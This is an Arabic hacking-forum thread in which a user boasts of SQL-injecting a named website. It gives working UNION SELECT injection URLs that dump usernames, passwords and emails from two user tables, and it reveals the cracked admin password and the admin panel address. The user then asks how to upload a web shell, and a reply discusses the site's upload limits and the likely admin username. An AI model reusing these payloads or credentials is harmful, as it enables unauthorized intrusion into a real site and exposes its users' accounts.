| اقتباس | | | | | المشاركة الأصلية كتبت بواسطة __MiM0__ | | | | | | | | :show off:
تم تجربة حقن احد المواقع الاخرى الموجودة على السيرفر وتم استخراج اليوزر والباسورد
وتم الدخول على الادمن الخاصة بالموقع بالموقع كود PHP: http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(US_Id,0x3a,US_Loginname,0x3a,US_Password,0x3a,US_Email)*/,4,5,6,7+from+tbl_users--
ملحوظة الباسورد بعد فك التشفيرة هو :: password http://chiirichtown.com/admin
ويوجد جدول اخر كود PHP: http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(l_id,0x3a,LoginName,0x3a,Password,0x3a,Email)*/,4,5,6,7+from+tbl_login--
وجربت اليوزر ادمن وادمن على السى بنل ولكن لم ينفع
ممكن ياشباب حد يقولى ينفع ارفع شل على السيرفر من لوحة الادمن ام لا ؟؟ وان كانت الاجابة اه ممكن شرح او درس للطريقة
والف شكرا مقدما | | | | | |
اخي العزيز اول شي مبروك بس الموقع امراتي يعني عربي
وبرمجه خاصه لو تبقى تحاول الى الصباح لا تستطيع عمل شي لانه لا يسمح برفع ملف غير صوره والصوره ما تستطيع تستعرضه لو رفعتها
بالنسبه
لليوزر فهو :siegend اسم الشركه الي عامله السكربت وعلى ما اعتقد استضافه كمان
الباسورد:password أضعف باسورد
تحياتي لك نصيحه لك شوف موقع ثاني يعني ليس الاختراق غايه انما انت حققت اكثر من اختراق وحقنت الموقع يعني لو اخترقتو ما تستفيد شي ( الا اذا كان مراهنه او عداوه)